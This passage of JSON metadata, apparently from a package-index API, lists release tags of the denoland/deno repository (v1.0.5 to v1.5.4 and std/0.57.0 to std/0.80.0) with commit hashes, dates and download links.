%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a